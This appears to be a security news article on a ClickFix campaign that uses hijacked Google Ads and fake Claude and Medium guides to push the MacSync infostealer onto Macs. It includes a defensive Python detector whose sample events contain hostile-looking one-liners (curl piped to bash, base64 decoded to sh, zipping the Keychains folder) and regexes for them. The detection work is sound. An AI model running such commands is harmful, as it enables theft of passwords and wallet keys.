ClickFix Campaign Uses Hijacked Google Ads and Fake Claude AI Guides to Infect Mac Users
Cybersecurity researchers at Moonlock Lab, the investigative arm of MacPaw, have uncovered a sophisticated ClickFix campaign targeting macOS users. The attack leverages hijacked Google Ads accounts and fake technical guides hosted on trusted platforms to trick victims into manually infecting their own systems.
The malware delivered in this campaign is a data-stealing infostealer known as MacSync.
How the Attack Begins
The infection chain starts with something as simple as a Google search.
Threat actors hijacked legitimate, verified Google Ads accounts belonging to:
- Earth Rangers, a Canadian children’s charity
- T S Q SA, a Colombian retailer
Because these advertiser accounts had established reputations and verification histories, their malicious ads bypassed Google’s automated security checks without raising red flags.
When users searched for common macOS-related terms such as:
- “online DNS resolver”
- “HomeBrew”
- “macOS CLI disk space analyzer”
these searches returned sponsored results at the top of Google Search. The ads redirected users to malicious content disguised as legitimate technical documentation.
The Two Lures
Victims were funneled into one of two traps:
1. Fake Claude AI Guide
A public page hosted on Claude titled “macOS Secure Command Execution.”
The page appeared legitimate and had already accumulated more than 15,600 views before being identified as malicious.
2. Fake Medium Article
A fraudulent article hosted on Medium, designed to impersonate Apple’s official support documentation.
Both pages provided what appeared to be legitimate troubleshooting instructions.
The ClickFix Technique
The attack uses a social engineering tactic known as ClickFix.
Instead of exploiting a software vulnerability, attackers rely on user trust. The fake guides instruct victims to copy and paste a specific command into macOS Terminal to “fix” an issue or install a tool.
When executed, the command secretly downloads and installs the MacSync infostealer.
Because the victim types or pastes the command into an interactive Terminal session themselves, the download and installation look like ordinary user activity rather than an exploit, which lets the malware slip past many traditional security protections.
What MacSync Steals
MacSync is a highly capable infostealer and an evolved rebrand of an older malware strain called Mac.c.
Once installed, it searches for:
- macOS Keychain data (stored system passwords)
- Browser-saved credentials
- Cryptocurrency wallet private keys
- Other sensitive local data
The harvested information is compressed into a file named osalogging.zip and transmitted to the attackers’ Command-and-Control (C2) server.
Researchers believe both the Claude and Medium variants connect to the same backend infrastructure, suggesting a single threat actor group is behind the campaign.
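As an added example (not code from the Moonlock report or from MacPaw), the heuristic below shows how a defender could flag the ClickFix pattern described above, a fetch-and-execute or decode-and-execute one-liner run from Terminal, together with the osalogging.zip staging artifact, in process-execution telemetry. The event format and every sample command line are constructed for illustration and are not indicators from the campaign.

```python
import re

# Constructed sample events (not from the Moonlock report); the format is a hypothetical
# "<timestamp> <user> <parent process> <command line>" as an EDR or shell-history exporter might emit.
SAMPLE_EVENTS = [
    "2025-01-10T09:12:01Z alice Terminal brew install htop",
    "2025-01-10T09:15:44Z alice Terminal curl -fsSL https://pastebin.invalid/fix.sh | bash",
    "2025-01-10T09:16:02Z alice Terminal echo aGVsbG8= | base64 -d | sh",
    "2025-01-10T09:16:30Z alice bash zip -r /tmp/osalogging.zip /Users/alice/Library/Keychains",
    "2025-01-10T09:17:10Z alice Terminal git pull origin main",
]

# Each rule is (name, regex). The first three describe how a pasted ClickFix one-liner typically
# behaves (remote fetch piped to a shell, base64 decode piped to a shell, AppleScript admin prompt);
# the last matches the archive name the article reports MacSync uses to stage stolen data.
RULES = [
    ("remote_script_piped_to_shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64_decoded_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("osascript_admin_prompt",
     re.compile(r"osascript\b.*with administrator privileges")),
    ("macsync_staging_archive",
     re.compile(r"\bosalogging\.zip\b")),
]

def parse_event(line):
    """Split one event into its fields; the command line keeps all of its own whitespace."""
    ts, user, parent, cmdline = line.split(" ", 3)
    return {"ts": ts, "user": user, "parent": parent, "cmdline": cmdline}

def match_rules(cmdline):
    """Return the names of every rule whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def detect_clickfix(events):
    """Return one finding per suspicious event: the fields, the rules that fired, and whether
    the command came straight from an interactive Terminal (the ClickFix delivery path)."""
    findings = []
    for line in events:
        ev = parse_event(line)
        hits = match_rules(ev["cmdline"])
        if hits:
            findings.append({**ev, "rules": hits, "interactive": ev["parent"] == "Terminal"})
    return findings

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f["ts"], f["user"], f["rules"], "(typed in Terminal)" if f["interactive"] else "")
```

Treat a hit on the first two rules from an interactive Terminal as a high-priority alert, since a legitimate installer rarely needs a user to paste a piped download into a shell; the archive rule is a campaign-specific indicator that will need updating as the malware is rebranded.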
AI Platforms Increasingly Abused
This is not the first time artificial intelligence platforms have been weaponized for malware distribution. Similar campaigns have previously abused tools like:
- ChatGPT
- Grok
By hosting malicious instructions on trusted platforms, attackers exploit user confidence in well-known brands.
Why This Attack Is Dangerous
This campaign highlights several troubling trends:
- Hijacking legitimate Google Ads accounts to bypass ad verification
- Abusing trusted publishing platforms
- Leveraging AI-branded content to increase credibility
- Using social engineering instead of technical exploits
- Continuously refining malware families
MacSync’s evolution from Mac.c demonstrates how threat actors adapt and upgrade their tools to evade detection and improve effectiveness.
How to Stay Safe
Security experts advise:
- Never paste commands into Terminal unless you fully understand what they do
- Avoid downloading software through sponsored search results
- Access tools and documentation directly from official websites
- Treat AI-generated technical guides with caution
Even trusted platforms can host malicious content if threat actors exploit them cleverly.
“This ClickFix campaign is a serious reminder to Mac users: never paste Terminal commands from sponsored search results or unfamiliar guides. Always rely on official sources for software and troubleshooting to avoid MacSync and similar malware.”